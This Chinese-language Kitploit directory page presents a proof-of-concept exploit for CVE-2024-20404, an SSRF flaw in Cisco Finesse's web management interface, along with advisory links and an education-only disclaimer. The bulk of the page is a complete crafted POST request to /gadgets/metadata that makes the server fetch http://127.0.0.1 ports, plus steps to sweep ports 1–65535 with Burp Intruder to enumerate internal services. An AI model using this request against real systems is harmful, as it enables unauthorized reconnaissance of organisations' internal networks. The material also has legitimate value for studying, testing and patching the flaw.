Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-20404 — CVE-2024-20404 的概念验证漏洞利用,演示了 Cisco Finesse 基于 Web 的管理界面中的 SSRF 漏洞,通过发送精心构造的 HTTP 请求来枚举本地服务。 | Kitploit
工具/GitHubGitHub/3zz4t/cve-2024-20404
侦察漏洞分析漏洞利用信息收集Web安全渗透测试
GitHub3zz4t/cve-2024-20404

CVE-2024-20404

CVE-2024-20404 的概念验证漏洞利用,演示了 Cisco Finesse 基于 Web 的管理界面中的 SSRF 漏洞,通过发送精心构造的 HTTP 请求来枚举本地服务。

查看仓库
2112年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

描述

Cisco Finesse 基于 Web 的管理界面存在一个漏洞,可能允许未经身份验证的远程攻击者对受影响的系统发动 SSRF 攻击。

该漏洞是由于对发送至受影响系统的特定 HTTP 请求中用户提供的输入验证不足所致。攻击者可通过向受影响设备发送特制 HTTP 请求来利用此漏洞。成功利用后,攻击者能够获取与受影响设备相关联的服务中的有限敏感信息。

概念验证 (PoC)

  1. 发送以下请求,将 <target> 替换为你的目标,以检查服务器本地主机上端口号 "8444" 的响应。
root@kitploit:~
POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

  1. 使用 Burp Suite Intruder 扫描 Cisco Finesse 基于 Web 的管理服务器上的所有开放端口,将端口号范围从 1 更改为 65535。

  2. 你会在关闭的端口上看到 "Connection refused" 响应。

  1. 其他错误消息表明这些端口是开放的,可被枚举。

参考资料

  • https://nvd.nist.gov/vuln/detail/CVE-2024-20404
  • https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew

免责声明

这只是一个概念验证 (PoC),用于证明 Cisco Finesse 基于 Web 的管理界面容易受到服务器端请求伪造 (SSRF) 攻击,且此 PoC 仅用于教育目的。请负责任地使用,并仅在获得明确测试许可的系统上使用。滥用此 PoC 可能导致严重后果。

下载工具